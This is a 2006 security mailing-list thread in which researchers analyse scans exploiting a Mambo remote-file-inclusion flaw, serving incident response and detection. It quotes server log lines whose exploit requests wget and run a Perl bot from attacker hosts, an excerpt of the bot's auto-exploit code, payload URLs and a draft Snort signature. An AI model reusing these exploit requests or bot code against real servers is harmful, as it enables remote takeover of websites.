I was looking at the scripts they try to download and
it does not looks like a common perl bot (connecting
to irc). It's also written in php and by a brazilian
person (comments in portuguese) and with a terrible
code :) I didn't have time to fully look at it,
though.


These are the pages they access:

http://usuarios.lycos.es/athos666/d25/
http://usuarios.lycos.es/athos666/d25/therules25.dat
http://radius01.comete.ci/tool.gif


I'm attaching them just in case they remove
these pages (please be aware that they are
scripts, not gifs :)).


Thanks,

--
Daniel B. Cid
dcid @ ( at ) ossec.net

--- Jamie Riden <[EMAIL PROTECTED]> escreveu:

> Seems to have some kind of google search code for
> the particular
> vulnerability - haven't seen this before:
> 
> if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {^M
>              sendraw($IRC_cur_socket, "PRIVMSG
> $printl
> :\002[GOOGLE]\002 Scanning for unpatched mambo for
> ".$1."
> seconds.");^M
>              srand;^M
>              my $itime = time;^M
>              my ($cur_time);^M
>              my ($exploited);^M
>              $boturl=$2;^M
>              $cur_time = time - $itime;$exploited =
> 0;^M
>                 while($1>$cur_time){^M
>                     $cur_time = time - $itime;^M
>                     @urls=fetch();^M
>                         foreach $url (@urls) {^M
>                         sendraw($IRC_cur_socket,
> "PRIVMSG $printl
> :\002[GOOGLE]\002 Trying to exploit ".$url);^M
>                         $cur_time = time - $itime;^M
>                         my $path = "";my $file =
> "";($path, $file) =
> $url =~ /^(.+)\/(.+)$/;^M
>                         $url
>
=$path."/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=$boturl?";^M
>                         $page = http_query($url);^M
>                         $exploited = $exploited +
> 1;^M
>                     }^M
>                 }^M
>              sendraw($IRC_cur_socket, "PRIVMSG
> $printl
> :\002[GOOGLE]\002 Exploited ".$exploited." boxes in
> ".$1."
> seconds.");^M
> 
> This is a quick stab at a snort sig:
> 
> alert tcp $EXTERNAL_NET !21:443 -> $HOME_NET !80
> (msg: "BLEEDING-EDGE
> perlb0t Bot Reporting Scan/Exploit"; flow:
> to_server,established;
> content:"PRIVMSG|20|"; nocase; within: 80; tag:
> session, 20, packets;
> pcre:"/(GOOGLE|HTTP|TCP|SCAN|UDP|VERSION)/i";
> within:16;
>
pcre:"/(Exploiting|Exploited}Attacking|Scanning|perlb0t)/i";
> classtype: trojan-activity; sid: xxxx; rev:1; )
> 
> but I'm sure this could be improved.
> 
> cheers,
>  Jamie
> 
> On 15/05/06, Jamie Riden <[EMAIL PROTECTED]> wrote:
> > Looks like some sort of shellbot wanting to
> connect to an IRC channel
> > #abusers on abuser.hacked.in:8080.
> >
> > I've been seeing occaisonal probes for Mambo's
> index.php on and off
> > for a while now - the first part is similar to
> >
>
http://nz-honeynet.org/papers/mambo-exploit-obfuscated.pdf
> but the
> > payloads are slightly different, though it always
> seems to end up with
> > an IRC bot of some kind.
> >
> > I usually see them coupled with scans for
> coppermine and other remote
> > include issues, plus xmlrpc probes.
> >
> > I think you're seeing an attempt to exploit
> issue#3 here -
> > http://secunia.com/advisories/18935/
> >
> > cheers,
> >  Jamie
> >
> > On 14/05/06, Daniel Cid <[EMAIL PROTECTED]>
> wrote:
> > > Since Thursday night I'm seeing a high volume of
> scans
> > > on different web servers for possibly the
> following
> > > vulns:
> > >
> > > http://secunia.com/advisories/14337/
> > >
> http://www.osvdb.org/displayvuln.php?osvdb_id=10180
> > >
> > >
> > > However, they say the problem is on function.php
> and
> > > I'm seeing them on index.php. Can anyone confirm
> that?
> > >
> > > Some log samples:
> > >
> > > 200.80.39.39 - - [12/May/2006:15:27:28 -0300]
> "GET
> > >
>
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
> > > HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > > 217.160.131.47 - - [12/May/2006:15:34:30 -0300]
> "GET
> > >
>
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
> > > HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > > 58.26.138.159 - - [12/May/2006:16:03:47 -0300]
> "GET
> > >
>
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
> > > HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > > 200.80.39.39 - - [12/May/2006:16:27:28 -0300]
> "GET
> > >
>
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
> > > HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > > 217.160.131.47 - - [12/May/2006:16:29:30 -0300]
> "GET
> > >
>
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
> > > HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > > 58.26.138.159 - - [12/May/2006:16:36:47 -0300]
> "GET
> > >
>
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
> > > HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > > 212.87.13.140 - - [12/May/2006:16:50:02 -0300]
> "GET
> > >
>
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radius01.comete.ci/tool.gif?&cmd=cd%20/tmp/;wget%20http://radius01.comete.ci/session.gif;perl%20session.gif;rm%20-rf%20session.*?
> > > HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> >
> > --
> > Jamie Riden / [EMAIL PROTECTED] /
> [EMAIL PROTECTED]
> > NZ Honeynet project - http://www.nz-honeynet.org/
> >
> 
> 
> -- 
> Jamie Riden / [EMAIL PROTECTED] /
> [EMAIL PROTECTED]
> NZ Honeynet project - http://www.nz-honeynet.org/
> 


                
_______________________________________________________ 
Navegue com o Yahoo! Acesso Grátis, assista aos jogos do Brasil na Copa e ganhe 
prêmios de hora em hora! 
http://br.yahoo.com/artilheirodacopa/

GIF image

Attachment: therules25.dat
Description: 1269156576-therules25.dat

Reply via email to